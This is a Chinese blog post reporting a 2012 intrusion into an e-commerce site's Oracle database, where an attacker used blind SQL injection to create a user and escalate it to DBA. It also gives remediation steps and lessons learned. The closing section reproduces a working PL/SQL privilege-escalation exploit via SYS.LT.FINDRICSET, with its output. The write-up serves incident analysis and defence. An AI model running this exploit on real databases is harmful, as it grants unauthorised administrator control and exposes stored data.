ITPub博客

首页 > Linux操作系统 > Linux操作系统 > 电子商务网站数据库被入侵事件过程

电子商务网站数据库被入侵事件过程

原创 Linux操作系统 作者:sundog315 时间:2013-05-07 16:14:34 0 删除 编辑

 

事件过程:

2012-10-19,同事在日常巡检时发现一套对外服务的电子商务系统后台Oracle数据库中出现了一个名为zwell的用户,并且,该用户具有DBA权限。

 

xxx 2012-10-19 10:13:34

我发现个问题。

在数据库里面,多了个zwell用户,创建日期是9月7日,有dba权限

 

按照管理规定,所有的Oracle数据库均有DDL触发器,查看触发器发现:

 

1     CREATE         ZWELL   CREATE USER zwell IDENTIFIED BY *******      WD_WEB     2012/9/7 13:53:59       11028547     FALSE     SYSTEM 5     WD_WEB     57   ptserver8                    10.x.x.x  tcp  DATABASE   

 

1     WD_WEB     12200617                   ROLE PRIVILEGE  GRANT   2012/10/9 15:38:20   10.0.8.10      grant dba to zwell     

 

此用户在2012/9/7 13:53:59,通过CREATE USER zwell IDENTIFIED BY ******* SQL语句创建,发出此SQL的服务器为WEB服务器集群第8台(ptserver8),IP地址为WEB集群F5接口地址(10.x.x.x

 

并且,在2012/10/9 15:38:20,通过grant dba to zwell SQL语句,将zwell用户提升为DBA权限

 

此用户已建立了1个多月,例行检查只检查拥有DBA权限的用户,导致此用户被建立很长时间后才被发现

 

2012-10-19日,通过对WEB服务器的apache日志进行检查,在2012/9/7 13:53:59秒前后有大量的SQL注入行为,发出SQL注入入侵的源IP113.71.184.32)属于广东省佛山市电信:

但由于apache日志记录时间顺序问题,导致当时并未找到SQL注入的对应日志

 

2012-10-19日下午,紧急对此电子商务网站进行应用漏洞扫描,发现高危漏洞

 

2012-10-19日夜间, 鉴于短时间内无法确认被入侵途径及目的,经多方商议,建议先进行如下处理

1.         应用系统数据库用户存在IMP_FULL_DATABASE权限,而此权限应为过度授权,拥有此权限则可创建用户。进行收回

2.         尽快修改数据库账户密码,以及相关操作系统密码

3.         将数据库版本由10.2.0.1升级至10.2.0.5

4.         对数据库内关键信息进行审计

 

2012-10-20日早,对apache日志进行仔细检查后,确认此次入侵为SQL方式入侵,入侵入口为/service/service.do盲注方式,发出SQL注入入侵的源IP119.57.81.78)属于北京市东四IDC机房

yyy 10:52:51

找到赋权语句了,可以确认是SQL注入方式提权

yyy 10:53:04

yyy 10:53:27

2012-10-20日下午,再次检查发出创建用户SQLptserver8服务器的apache日志,发现了与创建用户对应的日志信息:

创建用户操作也是通过/service/service.do进行SQL注入,至此,整个入侵流程均已查清。

 

事件分析:

在此次安全事件中,黑客使用WEB页面的盲注漏洞,采用SQL注入的方式创建了zwell用户,并且,利用了Oracle 10.2.0.1的提权漏洞,赋予zwell用户DBA权限。

 

经验教训:

1.WEB应用应进行完善的代码检查,避免SQL注入漏洞

       有很多方法可以避免SQL注入漏洞,比如,最常见的,使用绑定变量,但由于此应用程序为外包开发方式,供应商之前已开发了一套基础版本,此版本为在基础版本的升级版本,因此,导致基础版本的问题也一并带入了生产环境,导致此漏洞

 

2.未进行完善的代码安全检查

       目前有很多工具可以对应用进行安全检查,类似的SQL注入型漏洞一般都可以检查出来,但由于仓促上线,经验也不够丰富,因此,导致应用带故上线

 

3.数据库版本未升级

       典型的问题,数据库版本过低导致存在提权漏洞,如数据库打了补丁,至少不会导致zwell用户被提升权限

 

4.日常检查不够全面

       只对拥有DBA权限的用户进行检查,导致被攻击后很长时间才发现攻击行为

 

5.对于WEB应用,日志是很有必要进行保留的,如果日志没有被改动,基本都可以从日志中重现整个安全事件的完整过程。

 

6.即使能够查到来源IP,此IP往往也是肉机IP,比如,在此次事件中,两次行为应是同一人完成,但创建用户的来源IP为广东省佛山市电信,提权IP为北京市东四IDC机房

 

-Oralce 10.2.0.1|提权漏洞

 

SQL> select * from v$version;

BANNER

----------------------------------------------------------------

Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi

PL/SQL Release 10.2.0.1.0 - Production

CORE 10.2.0.1.0 Production

TNS for Linux: Version 10.2.0.1.0 - Production

NLSRTL Version 10.2.0.1.0 – Production

 

SQL> create user webtest identified by webtest;

用户已创建。

 

SQL> grant connect to webtest;

授权成功。

 

SQL> select * from dba_sys_privs where grantee='WEBTEST';

未选定行

 

SQL> select * from dba_role_privs where grantee=’WEBTEST';

GRANTEE GRANTED_ROLE ADM DEF

------------------------------ ------------------------------ --- ---

WEBTEST CONNECT NO YES --只给WD_WEB用户赋CONNECT权限,最小权限

 

SQL> conn webtest/webtest@xxxx:1521/orcl

已连接。

 

SQL> DECLARE

2 MYC NUMBER;

3 BEGIN

4 MYC := DBMS_SQL.OPEN_CURSOR;

5 DBMS_SQL.PARSE(MYC,

6 'declare pragma autonomous_transaction; begin execute immediate ''GRANT DBA TO WEBTEST'';commit;end;',

7 0);

8 DBMS_OUTPUT.PUT_LINE('Cursor: ' || MYC);

9 BEGIN

10 SYS.LT.FINDRICSET('.''||dbms_sql.execute( ' || MYC || ' )||'''')--',

11 'x');

12 END;

13 raise NO_DATA_FOUND;

14 EXCEPTION

15 WHEN NO_DATA_FOUND THEN

16 DBMS_OUTPUT.PUT_LINE('Cursor: ' || MYC);

17 WHEN OTHERS THEN

18 DBMS_OUTPUT.PUT_LINE('Cursor: ' || MYC);

19 END;

20 /

PL/SQL 过程已成功完成。

--网上随便找的脚本,执行提权操作

 

SQL> conn system/xxx@xxx:1521/orcl

已连接。

 

SQL> select * from dba_sys_privs where grantee='WEBTEST';

GRANTEE PRIVILEGE ADM

------------------------------ ---------------------------------------- ---

WEBTEST UNLIMITED TABLESPACE NO

 

SQL> select * from dba_role_privs where grantee='WEBTEST';

GRANTEE GRANTED_ROLE ADM DEF

------------------------------ ------------------------------ --- ---

WEBTEST CONNECT NO YES

WEBTEST DBA NO YES --多出了DBA权限

 

1.jpg

2.jpg

3.jpg

4.jpg

5.jpg

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/19423/viewspace-760027/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论

注册时间:2010-01-05

  • 博文量
    126
  • 访问量
    502815